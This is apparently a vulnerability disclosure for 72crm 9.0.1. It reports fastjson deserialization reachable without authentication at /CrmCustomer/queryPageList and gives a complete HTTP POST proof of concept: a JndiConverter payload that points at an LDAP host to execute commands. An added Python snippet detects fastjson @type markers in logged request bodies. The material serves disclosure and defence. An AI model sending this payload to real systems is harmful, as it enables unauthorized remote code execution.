Remote command execution vulnerability #28

@By-Yexing

Description

In version 72crm_9.0.1_20191202, insecure components are used, which causes potential remote command execution. Attackers can directly attack the system without authorization.
An insecure version of the fastjson component was used
First we found a vulnerability trigger:
http://localhost:8080/CrmCustomer/queryPageList
The constructor of BasePageRequest is called for processing. During processing, the parseObject() method of fastjson is first called to parse the JSON string into a Java bean. Due to the deserialization vulnerability in this version of fastjson, attackers only need to visit /CrmCustomer/queryPageList and submit a malicious JSON string to trigger the loophole.
There are many attack modes in version 1.2.54, and only one of them is shown below:
This attack requires the xbean jar package to be introduced and AutoType to be enabled.
Start the attack
POC:

```http
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"
```
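Added example, not part of this report or the 72crm project: a small Python check a defender can run over request bodies logged at this endpoint. It walks the JSON tree and flags every fastjson `@type` marker with its path and class name, since a CRM list query from a browser should never carry a Java class name. The sample bodies are constructed here; the first is modelled on the PoC above.

```python
import json

# Constructed samples: the PoC body from the report (minus the stray trailing quote),
# a benign query, and a nested body to show the walk goes into arrays and sub-objects.
POC_BODY = '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}'
BENIGN_BODY = '{"page":1,"limit":15,"search":"acme"}'
NESTED_BODY = '{"filters":[{"@type":"java.util.HashMap","k":"v"}]}'

# fastjson's polymorphic-type marker; with autoType enabled it selects the class to instantiate.
FASTJSON_TYPE_KEY = "@type"


def find_type_keys(node, path="$"):
    """Recursively collect (json_path, class_name) for every @type marker in a parsed body."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == FASTJSON_TYPE_KEY and isinstance(value, str):
                hits.append((child, value))
            hits.extend(find_type_keys(value, child))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits.extend(find_type_keys(value, f"{path}[{index}]"))
    return hits


def inspect_body(body: str) -> dict:
    """Classify one request body. Non-JSON input is reported, not raised, so a
    log-replay loop keeps going; any @type marker is treated as suspicious."""
    try:
        parsed = json.loads(body)
    except ValueError:
        return {"suspicious": False, "reason": "not JSON", "types": []}
    hits = find_type_keys(parsed)
    return {
        "suspicious": bool(hits),
        "reason": "fastjson @type marker present" if hits else "",
        "types": hits,
    }


if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY), ("nested", NESTED_BODY)):
        print(label, inspect_body(body))
```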
